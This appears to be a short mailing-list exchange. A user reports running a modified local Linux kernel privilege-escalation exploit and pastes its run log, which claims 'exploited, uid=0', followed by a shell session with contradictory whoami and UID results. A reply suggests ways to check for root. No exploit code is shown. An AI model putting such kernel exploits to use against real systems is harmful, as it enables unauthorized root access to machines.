A.J. Loonstra wrote:
I tried modifying the exploit not to use /dev/shm... but this is wat
happens:
~$ ./a.out
[+] SLAB cleanup
child 1 VMAs 287
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc5000000 - 0xc9d17000
Wait... |
[+] race won maps=6768
expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xc594b000
[+] gate modified ( 0xffec94bf 0x0804ec00 )
[+] exploited, uid=0
sh-2.05a$ whoami
arnaud
sh-2.05a$ mount
/dev/hda1 on / type ext2 (rw,errors=remount-ro)
proc on /proc type proc (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
/dev/hda2 on /home type ext3 (rw)
$sh-2.05a$ echo $UID
0
It says it did exploit but it didn't...
A.
Try doing something that would require root (eg.. mount something, create a file in /, etc)
Attachment:
smime.p7s
Description: S/MIME Cryptographic Signature